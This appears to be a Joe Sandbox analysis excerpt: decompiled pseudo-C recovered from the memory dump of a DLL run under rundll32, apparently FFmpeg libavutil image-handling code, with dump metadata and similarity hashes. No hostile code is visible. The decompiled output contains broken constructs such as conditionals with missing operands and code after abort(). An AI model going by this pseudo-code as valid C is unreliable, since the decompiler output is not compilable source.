                                                                      							 *_t95 =  *((intOrPtr*)(_t87 + 0x14));
                                                                      							L23();
                                                                      							 *((intOrPtr*)(_t95 + 0x40)) = _t87;
                                                                      							return __imp___aligned_free();
                                                                      						}
                                                                      						if( *((intOrPtr*)(_t84 + 0xc)) == 0) {
                                                                      							L8:
                                                                      							_t93 =  *((intOrPtr*)(_t84 + 0x1c));
                                                                      							if(_t93 == 0) {
                                                                      								L20:
                                                                      								 *_t95 =  *_t84;
                                                                      								L23();
                                                                      								 *_t95 =  *((intOrPtr*)(_t84 + 8));
                                                                      								L23();
                                                                      								 *_t95 =  *((intOrPtr*)(_t84 + 0x14));
                                                                      								L23();
                                                                      								 *_t95 = _t84;
                                                                      								L23();
                                                                      								goto L21;
                                                                      							}
                                                                      							if( *((intOrPtr*)(_t93 + 0xc)) == 0) {
                                                                      								L12:
                                                                      								_t78 =  *((intOrPtr*)(_t93 + 0x1c));
                                                                      								if(_t78 == 0) {
                                                                      									L19:
                                                                      									 *_t95 =  *_t93;
                                                                      									L23();
                                                                      									 *_t95 =  *((intOrPtr*)(_t93 + 8));
                                                                      									L23();
                                                                      									 *_t95 =  *((intOrPtr*)(_t93 + 0x14));
                                                                      									L23();
                                                                      									 *_t95 = _t93;
                                                                      									L23();
                                                                      									goto L20;
                                                                      								}
                                                                      								if( *((intOrPtr*)(_t78 + 0xc)) == 0) {
                                                                      									L16:
                                                                      									_t55 =  *((intOrPtr*)(_t78 + 0x1c));
                                                                      									if( *((intOrPtr*)(_t78 + 0x1c)) != 0) {
                                                                      										 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
                                                                      										L10012850(_t55);
                                                                      										_t78 =  *((intOrPtr*)(_t95 + 0x1c));
                                                                      									}
                                                                      									 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
                                                                      									 *_t95 =  *_t78;
                                                                      									L23();
                                                                      									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x1c)) + 8));
                                                                      									L23();
                                                                      									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x1c)) + 0x14));
                                                                      									L23();
                                                                      									 *_t95 =  *((intOrPtr*)(_t95 + 0x1c));
                                                                      									L23();
                                                                      									goto L19;
                                                                      								}
                                                                      								_t72 = 0;
                                                                      								do {
                                                                      									 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
                                                                      									_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t78 + 8)) + _t72 * 4));
                                                                      									_t72 = _t72 + 1;
                                                                      									 *_t95 = _t61;
                                                                      									L23();
                                                                      									_t78 =  *((intOrPtr*)(_t95 + 0x1c));
                                                                      								} while (_t72 <  *((intOrPtr*)(_t78 + 0xc)));
                                                                      								goto L16;
                                                                      							}
                                                                      							_t73 = 0;
                                                                      							do {
                                                                      								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 8)) + _t73 * 4));
                                                                      								_t73 = _t73 + 1;
                                                                      								 *_t95 = _t63;
                                                                      								L23();
                                                                      							} while (_t73 <  *((intOrPtr*)(_t93 + 0xc)));
                                                                      							goto L12;
                                                                      						}
                                                                      						_t74 = 0;
                                                                      						do {
                                                                      							_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 8)) + _t74 * 4));
                                                                      							_t74 = _t74 + 1;
                                                                      							 *_t95 = _t65;
                                                                      							L23();
                                                                      						} while (_t74 <  *((intOrPtr*)(_t84 + 0xc)));
                                                                      						goto L8;
                                                                      					}
                                                                      					_t75 = 0;
                                                                      					do {
                                                                      						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 8)) + _t75 * 4));
                                                                      						_t75 = _t75 + 1;
                                                                      						 *_t95 = _t67;
                                                                      						L23();
                                                                      					} while (_t75 <  *((intOrPtr*)(_t87 + 0xc)));
                                                                      					goto L4;
                                                                      				}
                                                                      				return _t43;
                                                                      			}

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 196854d94c2d3dadbfed7b001a059d3303f2942ada5cc75a7543bfd3e5186445
                                                                      • Instruction ID: aab0cb6abdf460125275c6e5ebe0c2fb3ff18ba6de562b5529d80b352c1cac01
                                                                      • Opcode Fuzzy Hash: 196854d94c2d3dadbfed7b001a059d3303f2942ada5cc75a7543bfd3e5186445
                                                                      • Instruction Fuzzy Hash: 14519F79A047098FCB50EFA9D0C5A5AF7F0FF44250F41892DE8998B301DA71F985CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 35%
                                                                      			E1002334C(signed int __edx, void* __eflags) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				unsigned int _t304;
                                                                      				char* _t305;
                                                                      				signed int _t314;
                                                                      				signed int _t316;
                                                                      				signed int _t325;
                                                                      				signed int _t330;
                                                                      				signed int _t331;
                                                                      				signed int _t332;
                                                                      				int _t335;
                                                                      				signed int _t336;
                                                                      				signed int _t338;
                                                                      				signed int _t342;
                                                                      				signed int _t344;
                                                                      				signed int _t347;
                                                                      				signed int _t348;
                                                                      				signed char* _t350;
                                                                      				signed int _t351;
                                                                      				int _t352;
                                                                      				signed int _t354;
                                                                      				int _t355;
                                                                      				signed int _t356;
                                                                      				signed int _t358;
                                                                      				int _t361;
                                                                      				signed int _t362;
                                                                      				void _t364;
                                                                      				signed int _t365;
                                                                      				signed int _t367;
                                                                      				signed int _t369;
                                                                      				signed int _t372;
                                                                      				intOrPtr _t379;
                                                                      				intOrPtr _t380;
                                                                      				intOrPtr _t381;
                                                                      				intOrPtr _t382;
                                                                      				intOrPtr _t383;
                                                                      				intOrPtr _t384;
                                                                      				signed int _t386;
                                                                      				signed int _t388;
                                                                      				char* _t389;
                                                                      				signed int _t393;
                                                                      				signed char _t398;
                                                                      				void* _t399;
                                                                      				char* _t405;
                                                                      				char _t406;
                                                                      				char* _t408;
                                                                      				signed int _t409;
                                                                      				signed char _t411;
                                                                      				signed int _t413;
                                                                      				signed int _t414;
                                                                      				signed int _t417;
                                                                      				signed int _t418;
                                                                      				signed short _t425;
                                                                      				void* _t429;
                                                                      				char* _t430;
                                                                      				unsigned int _t434;
                                                                      				signed int _t435;
                                                                      				signed int _t437;
                                                                      				signed char _t439;
                                                                      				signed char* _t440;
                                                                      				unsigned int _t441;
                                                                      				signed int _t442;
                                                                      				int _t444;
                                                                      				signed char _t449;
                                                                      				void* _t450;
                                                                      				signed int _t453;
                                                                      				signed int _t454;
                                                                      				intOrPtr _t455;
                                                                      				signed char _t456;
                                                                      				signed char _t457;
                                                                      				int _t458;
                                                                      				char* _t463;
                                                                      				char* _t464;
                                                                      				signed int _t465;
                                                                      				signed int _t467;
                                                                      				signed int _t471;
                                                                      				signed int _t474;
                                                                      				signed int _t475;
                                                                      				signed int _t477;
                                                                      				signed int _t479;
                                                                      				signed int* _t484;
                                                                      				signed int _t489;
                                                                      				signed int _t494;
                                                                      				void _t495;
                                                                      				char* _t496;
                                                                      				signed int _t498;
                                                                      				void* _t499;
                                                                      				signed int _t501;
                                                                      				void* _t502;
                                                                      				void* _t503;
                                                                      				signed int _t507;
                                                                      				intOrPtr _t508;
                                                                      				intOrPtr _t509;
                                                                      				void* _t514;
                                                                      				signed int _t517;
                                                                      				char* _t519;
                                                                      				signed int _t526;
                                                                      				signed int _t528;
                                                                      				int _t533;
                                                                      				signed int _t534;
                                                                      				void* _t537;
                                                                      				signed int* _t538;
                                                                      				signed int _t539;
                                                                      				char* _t540;
                                                                      				void* _t541;
                                                                      				unsigned int _t543;
                                                                      				unsigned int _t544;
                                                                      				signed int _t545;
                                                                      				signed int _t547;
                                                                      				signed int _t548;
                                                                      				signed int _t549;
                                                                      				signed int _t550;
                                                                      				signed int _t552;
                                                                      				int _t553;
                                                                      				void* _t554;
                                                                      				char** _t555;
                                                                      				signed int* _t557;
                                                                      				void* _t571;
                                                                      
                                                                      				_t465 = __edx;
                                                                      				_t555 = _t554 - 0x6c;
                                                                      				_t408 = _t555[0x24];
                                                                      				_t519 = _t555[0x22];
                                                                      				_t555[3] = _t555[0x27];
                                                                      				 *_t555 = _t408;
                                                                      				_t555[2] = _t555[0x26];
                                                                      				_t555[1] = _t555[0x25];
                                                                      				_t304 = E10023180(__edx, __eflags);
                                                                      				 *_t555 = _t408;
                                                                      				_t543 = _t304;
                                                                      				_t305 = E10034790();
                                                                      				_t555[0x12] = _t305;
                                                                      				_t430 = _t305;
                                                                      				if((_t543 >> 0x0000001f | _t465 & 0xffffff00 | _t543 - _t555[0x21] > 0x00000000) != 0 || _t430 == 0) {
                                                                      					_t544 = 0xffffffea;
                                                                      					goto L28;
                                                                      				} else {
                                                                      					_t467 = _t430[4] & 0x000000ff;
                                                                      					if(_t467 == 0) {
                                                                      						_t496 = 0;
                                                                      						_t555[0xf] = 0;
                                                                      					} else {
                                                                      						_t463 =  >=  ? _t430[0x10] : 0;
                                                                      						_t555[0xf] = _t463;
                                                                      						_t496 = _t463;
                                                                      						if(_t467 != 1) {
                                                                      							_t464 = _t555[0x12];
                                                                      							_t496 =  >=  ? _t555[0xf] : _t464[0x24];
                                                                      							_t555[0xf] = _t496;
                                                                      							if(_t467 != 2) {
                                                                      								_t405 =  >=  ? _t496 : _t464[0x38];
                                                                      								_t555[0xf] = _t405;
                                                                      								_t496 = _t405;
                                                                      								if(_t467 != 3) {
                                                                      									_t406 = _t464[0x4c];
                                                                      									_t571 = _t496 - _t406;
                                                                      									_t407 =  >=  ? _t496 : _t406;
                                                                      									_t555[0xf] =  >=  ? _t496 : _t406;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_t555[1] = _t408;
                                                                      					_t555[2] = _t555[0x25];
                                                                      					 *_t555 =  &(_t555[0x14]);
                                                                      					if(E100215D0(_t571) < 0) {
                                                                      						_t555[5] = 0x209;
                                                                      						_t555[1] = 0;
                                                                      						 *_t555 = 0;
                                                                      						_t555[4] = "libavutil/imgutils.c";
                                                                      						_t555[3] = "ret >= 0";
                                                                      						_t555[2] = "Assertion %s failed at %s:%d\n";
                                                                      						E10026560();
                                                                      						abort();
                                                                      						_push(_t543);
                                                                      						_push(_t496);
                                                                      						_t557 = _t555 - 0x15c;
                                                                      						_t409 = _t557[0x5e];
                                                                      						 *_t557 = _t409;
                                                                      						_t314 = E10034790(_t408);
                                                                      						 *_t557 = _t409;
                                                                      						_t545 = _t314;
                                                                      						_t557[0xd] = L10034870(_t519);
                                                                      						_t316 = 0;
                                                                      						__eflags = 0;
                                                                      						do {
                                                                      							 *((intOrPtr*)(_t557 + _t316 + 0xd0)) = 0;
                                                                      							 *((intOrPtr*)(_t557 + _t316 + 0xd4)) = 0;
                                                                      							_t316 = _t316 + 8;
                                                                      							__eflags = _t316 - 0x80;
                                                                      						} while (_t316 < 0x80);
                                                                      						_t557[0x14] = 0;
                                                                      						_t557[0x15] = 0;
                                                                      						_t557[0x16] = 0;
                                                                      						_t557[0x17] = 0;
                                                                      						_t557[0x18] = 0;
                                                                      						_t557[0x19] = 0;
                                                                      						_t557[0x1a] = 0;
                                                                      						_t557[0x1b] = 0;
                                                                      						__eflags = _t557[0xd] - 1 - 3;
                                                                      						if(_t557[0xd] - 1 > 3) {
                                                                      							L60:
                                                                      							return 0xffffffea;
                                                                      						} else {
                                                                      							__eflags = _t545;
                                                                      							if(_t545 == 0) {
                                                                      								goto L60;
                                                                      							} else {
                                                                      								_t325 =  *(_t545 + 8);
                                                                      								_t471 = _t325 & 0x00000008;
                                                                      								_t498 = _t471;
                                                                      								__eflags = _t498;
                                                                      								if(_t498 != 0) {
                                                                      									goto L60;
                                                                      								} else {
                                                                      									_t557[0xa] = _t325 & 0x00000020;
                                                                      									__eflags = _t325 & 0x00000004;
                                                                      									if(__eflags != 0) {
                                                                      										 *_t557 = _t409;
                                                                      										_t557[2] = 0;
                                                                      										_t557[1] = _t557[0x60];
                                                                      										_t547 = E10021480(__eflags);
                                                                      										_t330 = _t409 - 9;
                                                                      										__eflags = _t330 - 1;
                                                                      										_t331 = _t330 & 0xffffff00 | _t330 - 0x00000001 < 0x00000000;
                                                                      										__eflags = _t409 - 9;
                                                                      										_t411 =  !=  ? _t498 : 0xff;
                                                                      										__eflags = _t557[0xd] - 1;
                                                                      										if(__eflags != 0 || __eflags == 0) {
                                                                      											goto L60;
                                                                      										} else {
                                                                      											__eflags = _t547;
                                                                      											if(_t547 <= 0) {
                                                                      												goto L60;
                                                                      											} else {
                                                                      												__eflags = _t557[0x5c];
                                                                      												if(_t557[0x5c] != 0) {
                                                                      													__eflags = _t557[0x61];
                                                                      													_t526 =  *(_t557[0x5c]);
                                                                      													if(_t557[0x61] > 0) {
                                                                      														_t335 = (_t411 & 0x000000ff) * 0x1010101;
                                                                      														__eflags = _t335;
                                                                      														do {
                                                                      															__eflags = _t547 - 8;
                                                                      															_t474 = _t547;
                                                                      															_t499 = _t526;
                                                                      															if(_t547 >= 8) {
                                                                      																__eflags = _t526 & 0x00000001;
                                                                      																if((_t526 & 0x00000001) != 0) {
                                                                      																	 *_t526 = _t335;
                                                                      																	_t499 = _t526 + 1;
                                                                      																	_t226 = _t547 - 1; // -1
                                                                      																	_t474 = _t226;
                                                                      																}
                                                                      																__eflags = _t499 & 0x00000002;
                                                                      																if((_t499 & 0x00000002) != 0) {
                                                                      																	 *_t499 = _t335;
                                                                      																	_t474 = _t474 - 2;
                                                                      																	_t499 = _t499 + 2;
                                                                      																}
                                                                      																__eflags = _t499 & 0x00000004;
                                                                      																if((_t499 & 0x00000004) != 0) {
                                                                      																	 *_t499 = _t335;
                                                                      																	_t474 = _t474 - 4;
                                                                      																	_t499 = _t499 + 4;
                                                                      																}
                                                                      																_t434 = _t474;
                                                                      																_t474 = _t474 & 0x00000003;
                                                                      																_t435 = _t434 >> 2;
                                                                      																_t335 = memset(_t499, _t335, _t435 << 2);
                                                                      																_t557 =  &(_t557[3]);
                                                                      																_t499 = _t499 + _t435;
                                                                      															}
                                                                      															_t475 = _t474 & 0x00000007;
                                                                      															__eflags = _t475;
                                                                      															if(_t475 != 0) {
                                                                      																_t437 = 0;
                                                                      																__eflags = 0;
                                                                      																do {
                                                                      																	 *(_t499 + _t437) = _t411;
                                                                      																	_t437 = _t437 + 1;
                                                                      																	__eflags = _t437 - _t475;
                                                                      																} while (_t437 < _t475);
                                                                      															}
                                                                      															_t526 = _t526 +  *(_t557[0x5d]);
                                                                      															_t216 =  &(_t557[0x61]);
                                                                      															 *_t216 = _t557[0x61] - 1;
                                                                      															__eflags =  *_t216;
                                                                      														} while ( *_t216 != 0);
                                                                      													}
                                                                      												}
                                                                      												goto L77;
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										_t477 =  *(_t545 + 4) & 0x000000ff;
                                                                      										__eflags = _t477;
                                                                      										if(__eflags == 0) {
                                                                      											L57:
                                                                      											_t557[0xa] = _t545;
                                                                      											_t501 = _t557[0x60];
                                                                      											_t548 = 0;
                                                                      											_t528 = _t557[0xd];
                                                                      											while(1) {
                                                                      												_t557[2] = _t548;
                                                                      												_t557[1] = _t501;
                                                                      												 *_t557 = _t409;
                                                                      												_t336 = E10021480(__eflags);
                                                                      												 *(_t557 + 0x60 + _t548 * 4) = _t336;
                                                                      												__eflags = _t336;
                                                                      												if(_t336 < 0) {
                                                                      													goto L60;
                                                                      												}
                                                                      												_t548 = _t548 + 1;
                                                                      												__eflags = _t528 - _t548;
                                                                      												if(__eflags <= 0) {
                                                                      													_t549 = _t557[0xa];
                                                                      													__eflags = _t557[0x5c];
                                                                      													if(_t557[0x5c] == 0) {
                                                                      														L77:
                                                                      														_t332 = 0;
                                                                      														__eflags = 0;
                                                                      													} else {
                                                                      														_t557[0x13] = _t549;
                                                                      														__eflags = 0;
                                                                      														_t557[0xe] =  &(_t557[0x34]);
                                                                      														_t557[0xa] = 0;
                                                                      														do {
                                                                      															_t338 = _t557[0xa];
                                                                      															_t557[0xf] =  *(_t557 + 0x60 + _t338 * 4);
                                                                      															_t550 =  *(_t557[0x5c] + _t338 * 4);
                                                                      															__eflags = _t338 - 1 - 1;
                                                                      															if(_t338 - 1 <= 1) {
                                                                      																_t439 =  *(_t557[0x13] + 6) & 0x000000ff;
                                                                      																_t342 = 1 << _t439;
                                                                      															} else {
                                                                      																_t342 = 1;
                                                                      																_t439 = 0;
                                                                      																__eflags = 0;
                                                                      															}
                                                                      															_t344 = _t342 + _t557[0x61] - 1 >> _t439;
                                                                      															_t557[0xc] = _t344;
                                                                      															__eflags = _t344;
                                                                      															if(_t344 > 0) {
                                                                      																_t413 =  *(_t557 + 0x50 + _t557[0xa] * 4);
                                                                      																_t347 = _t557[0xf];
                                                                      																_t557[0xb] = _t413;
                                                                      																__eflags = _t347 - _t413;
                                                                      																_t533 =  >  ? _t413 : _t347;
                                                                      																_t557[0x10] = _t533;
                                                                      																_t348 = _t347 - _t533;
                                                                      																__eflags = _t348;
                                                                      																_t557[0x11] = _t348;
                                                                      																do {
                                                                      																	_t534 = _t557[0xb];
                                                                      																	__eflags = _t534;
                                                                      																	if(_t534 != 0) {
                                                                      																		_t350 = _t557[0xe];
                                                                      																		_t479 =  *_t350 & 0x000000ff;
                                                                      																		_t440 =  &(_t350[_t534]);
                                                                      																		while(1) {
                                                                      																			__eflags =  *_t350 - _t479;
                                                                      																			if( *_t350 != _t479) {
                                                                      																				break;
                                                                      																			}
                                                                      																			_t350 =  &(_t350[1]);
                                                                      																			__eflags = _t440 - _t350;
                                                                      																			if(_t440 == _t350) {
                                                                      																				L102:
                                                                      																				_t351 = _t557[0xf];
                                                                      																				_t502 = _t550;
                                                                      																				__eflags = _t351 - 8;
                                                                      																				_t414 = _t351;
                                                                      																				if(_t351 >= 8) {
                                                                      																					_t352 = _t479 * 0x1010101;
                                                                      																					__eflags = _t550 & 0x00000001;
                                                                      																					if((_t550 & 0x00000001) != 0) {
                                                                      																						 *_t550 = _t352;
                                                                      																						_t502 = _t550 + 1;
                                                                      																						_t414 = _t557[0xf] - 1;
                                                                      																					}
                                                                      																					__eflags = _t502 & 0x00000002;
                                                                      																					if((_t502 & 0x00000002) != 0) {
                                                                      																						 *_t502 = _t352;
                                                                      																						_t414 = _t414 - 2;
                                                                      																						_t502 = _t502 + 2;
                                                                      																					}
                                                                      																					__eflags = _t502 & 0x00000004;
                                                                      																					if((_t502 & 0x00000004) != 0) {
                                                                      																						 *_t502 = _t352;
                                                                      																						_t414 = _t414 - 4;
                                                                      																						_t502 = _t502 + 4;
                                                                      																					}
                                                                      																					_t441 = _t414;
                                                                      																					_t414 = _t414 & 0x00000003;
                                                                      																					_t442 = _t441 >> 2;
                                                                      																					memset(_t502, _t352, _t442 << 2);
                                                                      																					_t557 =  &(_t557[3]);
                                                                      																					_t502 = _t502 + _t442;
                                                                      																				}
                                                                      																				_t413 = _t414 & 0x00000007;
                                                                      																				__eflags = _t413;
                                                                      																				if(_t413 != 0) {
                                                                      																					_t354 = 0;
                                                                      																					__eflags = 0;
                                                                      																					do {
                                                                      																						 *(_t502 + _t354) = _t479;
                                                                      																						_t354 = _t354 + 1;
                                                                      																						__eflags = _t354 - _t413;
                                                                      																					} while (_t354 < _t413);
                                                                      																				}
                                                                      																			} else {
                                                                      																				continue;
                                                                      																			}
                                                                      																			goto L99;
                                                                      																		}
                                                                      																		__eflags = _t557[0xb] - 1;
                                                                      																		if(_t557[0xb] == 1) {
                                                                      																			goto L102;
                                                                      																		} else {
                                                                      																			_t355 = _t557[0x10];
                                                                      																			_t503 = _t550;
                                                                      																			_t537 = _t557[0xe];
                                                                      																			__eflags = _t355 - 8;
                                                                      																			_t444 = _t355;
                                                                      																			if(_t355 >= 8) {
                                                                      																				__eflags = _t550 & 0x00000001;
                                                                      																				if((_t550 & 0x00000001) != 0) {
                                                                      																					_t356 =  *_t537 & 0x000000ff;
                                                                      																					_t503 = _t550 + 1;
                                                                      																					_t537 = _t537 + 1;
                                                                      																					_t557[0x12] = _t356;
                                                                      																					 *_t550 = _t356;
                                                                      																					_t444 = _t557[0x10] - 1;
                                                                      																				}
                                                                      																				__eflags = _t503 & 0x00000002;
                                                                      																				if((_t503 & 0x00000002) != 0) {
                                                                      																					_t358 =  *_t537 & 0x0000ffff;
                                                                      																					_t503 = _t503 + 2;
                                                                      																					_t537 = _t537 + 2;
                                                                      																					_t444 = _t444 - 2;
                                                                      																					 *(_t503 - 2) = _t358;
                                                                      																				}
                                                                      																				__eflags = _t503 & 0x00000004;
                                                                      																				if((_t503 & 0x00000004) != 0) {
                                                                      																					_t364 =  *_t537;
                                                                      																					_t503 = _t503 + 4;
                                                                      																					_t537 = _t537 + 4;
                                                                      																					_t444 = _t444 - 4;
                                                                      																					 *(_t503 - 4) = _t364;
                                                                      																				}
                                                                      																			}
                                                                      																			memcpy(_t503, _t537, _t444);
                                                                      																			_t557 =  &(_t557[3]);
                                                                      																			_t557[2] = _t557[0x11];
                                                                      																			_t361 = _t557[0x10];
                                                                      																			_t557[1] = _t361;
                                                                      																			_t362 = _t361 + _t550;
                                                                      																			__eflags = _t362;
                                                                      																			 *_t557 = _t362;
                                                                      																			L10029830(_t413, _t537 + _t444 + _t444, _t537);
                                                                      																		}
                                                                      																	}
                                                                      																	L99:
                                                                      																	_t550 = _t550 +  *((intOrPtr*)(_t557[0x5d] + _t557[0xa] * 4));
                                                                      																	_t267 =  &(_t557[0xc]);
                                                                      																	 *_t267 = _t557[0xc] - 1;
                                                                      																	__eflags =  *_t267;
                                                                      																} while ( *_t267 != 0);
                                                                      															}
                                                                      															_t557[0xa] = _t557[0xa] + 1;
                                                                      															_t557[0xe] = _t557[0xe] + 0x20;
                                                                      															__eflags = _t557[0xd] - _t557[0xa];
                                                                      														} while (_t557[0xd] > _t557[0xa]);
                                                                      														_t332 = 0;
                                                                      													}
                                                                      													return _t332;
                                                                      												} else {
                                                                      													continue;
                                                                      												}
                                                                      												goto L121;
                                                                      											}
                                                                      											goto L60;
                                                                      										} else {
                                                                      											_t365 =  *(_t545 + 0x14);
                                                                      											__eflags = _t365;
                                                                      											_t447 =  >=  ? _t365 : 0;
                                                                      											__eflags = _t365 - 0x20;
                                                                      											 *((intOrPtr*)(_t557 + 0x50 +  *(_t545 + 0x10) * 4)) =  >=  ? _t365 : 0;
                                                                      											if(_t365 > 0x20) {
                                                                      												goto L60;
                                                                      											} else {
                                                                      												__eflags = _t477 - 1;
                                                                      												if(__eflags == 0) {
                                                                      													L45:
                                                                      													_t557[0x5e] = _t409;
                                                                      													_t557[0xa] = _t545;
                                                                      													_t367 = _t557[0xa];
                                                                      													_t557[0xc] = __eflags == 0;
                                                                      													_t145 = _t545 + 0x10; // 0x10
                                                                      													_t538 = _t145;
                                                                      													__eflags = _t557[0x5f] - 2;
                                                                      													_t557[0xe] = _t367;
                                                                      													_t507 = 0;
                                                                      													_t369 = (_t367 & 0xffffff00 | _t557[0x5f] != 0x00000002) & _t557[0xc] & 0x000000ff;
                                                                      													__eflags = _t369;
                                                                      													_t557[0xb] = _t369;
                                                                      													while(1) {
                                                                      														_t449 = _t538[4];
                                                                      														asm("cdq");
                                                                      														_t372 =  *(_t557 + 0x50 +  *_t538 * 4) / _t538[1];
                                                                      														_t557[0x20] = 0;
                                                                      														_t557[0x21] = 0;
                                                                      														__eflags = _t449 - 0x10;
                                                                      														_t557[0x22] = 0;
                                                                      														_t557[0x23] = 0;
                                                                      														if(_t449 > 0x10) {
                                                                      															goto L60;
                                                                      														}
                                                                      														__eflags = _t449 - 7;
                                                                      														if(_t449 > 7) {
                                                                      															L49:
                                                                      															__eflags = _t372;
                                                                      															if(_t372 <= 0) {
                                                                      																goto L60;
                                                                      															} else {
                                                                      																__eflags = _t507;
                                                                      																if(_t507 != 0) {
                                                                      																	L61:
                                                                      																	_t199 = _t507 - 1; // -1
                                                                      																	_t417 = 0;
                                                                      																	__eflags = _t199 - 1;
                                                                      																	if(_t199 <= 1) {
                                                                      																		__eflags = _t557[0xe];
                                                                      																		if(_t557[0xe] == 0) {
                                                                      																			_t417 = 0x00000080 << _t449 - 0x00000008 & 0x0000ffff;
                                                                      																		}
                                                                      																	} else {
                                                                      																		__eflags = _t507 - 3;
                                                                      																		if(_t507 == 3) {
                                                                      																			_t417 = (0x00000001 << _t449) - 0x00000001 & 0x0000ffff;
                                                                      																		}
                                                                      																	}
                                                                      																} else {
                                                                      																	__eflags = _t557[0xb];
                                                                      																	if(_t557[0xb] == 0) {
                                                                      																		goto L61;
                                                                      																	} else {
                                                                      																		_t425 = 0x10 << _t449 - 8;
                                                                      																		__eflags = _t425;
                                                                      																		_t417 = _t425 & 0x0000ffff;
                                                                      																	}
                                                                      																}
                                                                      																_t552 =  &(_t557[0x24]);
                                                                      																_t450 = _t552 + _t372 * 2;
                                                                      																_t484 = _t552;
                                                                      																do {
                                                                      																	 *_t484 = _t417;
                                                                      																	_t484 =  &(_t484[0]);
                                                                      																	__eflags = _t450 - _t484;
                                                                      																} while (_t450 != _t484);
                                                                      																_t418 = _t557[0xa];
                                                                      																_t538 =  &(_t538[5]);
                                                                      																_t557[7] = _t372;
                                                                      																_t557[5] = 0;
                                                                      																_t557[0x1c] =  &(_t557[0x34]);
                                                                      																_t557[4] = 0;
                                                                      																_t557[0x1d] =  &(_t557[0x3c]);
                                                                      																_t557[2] =  &(_t557[0x20]);
                                                                      																_t557[0x1e] =  &(_t557[0x44]);
                                                                      																_t557[6] = _t507;
                                                                      																_t507 = _t507 + 1;
                                                                      																_t557[1] =  &(_t557[0x1c]);
                                                                      																_t557[3] = _t418;
                                                                      																 *_t557 = _t552;
                                                                      																_t557[0x1f] =  &(_t557[0x4c]);
                                                                      																E10034210();
                                                                      																__eflags = ( *(_t418 + 4) & 0x000000ff) - _t507;
                                                                      																if(__eflags > 0) {
                                                                      																	continue;
                                                                      																} else {
                                                                      																	_t545 = _t557[0xa];
                                                                      																	_t409 = _t557[0x5e];
                                                                      																	goto L57;
                                                                      																}
                                                                      															}
                                                                      														} else {
                                                                      															__eflags = _t557[0xc];
                                                                      															if(_t557[0xc] != 0) {
                                                                      																goto L60;
                                                                      															} else {
                                                                      																goto L49;
                                                                      															}
                                                                      														}
                                                                      														goto L121;
                                                                      													}
                                                                      													goto L60;
                                                                      												} else {
                                                                      													_t453 =  *(_t545 + 0x24);
                                                                      													_t508 =  *((intOrPtr*)(_t545 + 0x28));
                                                                      													_t379 =  *((intOrPtr*)(_t557 + 0x50 + _t453 * 4));
                                                                      													__eflags = _t379 - _t508;
                                                                      													_t380 =  <  ? _t508 : _t379;
                                                                      													 *((intOrPtr*)(_t557 + 0x50 + _t453 * 4)) = _t380;
                                                                      													__eflags = _t380 - 0x20;
                                                                      													if(_t380 > 0x20) {
                                                                      														goto L60;
                                                                      													} else {
                                                                      														__eflags = _t477 - 2;
                                                                      														if(__eflags == 0) {
                                                                      															goto L45;
                                                                      														} else {
                                                                      															_t454 =  *(_t545 + 0x38);
                                                                      															_t509 =  *((intOrPtr*)(_t545 + 0x3c));
                                                                      															_t381 =  *((intOrPtr*)(_t557 + 0x50 + _t454 * 4));
                                                                      															__eflags = _t381 - _t509;
                                                                      															_t382 =  <  ? _t509 : _t381;
                                                                      															 *((intOrPtr*)(_t557 + 0x50 + _t454 * 4)) = _t382;
                                                                      															__eflags = _t382 - 0x20;
                                                                      															if(_t382 > 0x20) {
                                                                      																goto L60;
                                                                      															} else {
                                                                      																__eflags = _t477 - 3;
                                                                      																if(__eflags == 0) {
                                                                      																	goto L45;
                                                                      																} else {
                                                                      																	_t489 =  *(_t545 + 0x4c);
                                                                      																	_t455 =  *((intOrPtr*)(_t545 + 0x50));
                                                                      																	_t383 =  *((intOrPtr*)(_t557 + 0x50 + _t489 * 4));
                                                                      																	__eflags = _t383 - _t455;
                                                                      																	_t384 =  <  ? _t455 : _t383;
                                                                      																	 *((intOrPtr*)(_t557 + 0x50 + _t489 * 4)) = _t384;
                                                                      																	__eflags = _t384 - 0x20;
                                                                      																	if(__eflags > 0) {
                                                                      																		goto L60;
                                                                      																	} else {
                                                                      																		goto L45;
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_t456 = 0;
                                                                      						_t555[0x22] = _t519;
                                                                      						_t539 = 0xffffffff;
                                                                      						_t555[0x13] = _t543;
                                                                      						_t555[0xe] = _t555[0x23];
                                                                      						_t386 = 1;
                                                                      						_t555[0x11] =  ~(_t555[0x27]);
                                                                      						while(1) {
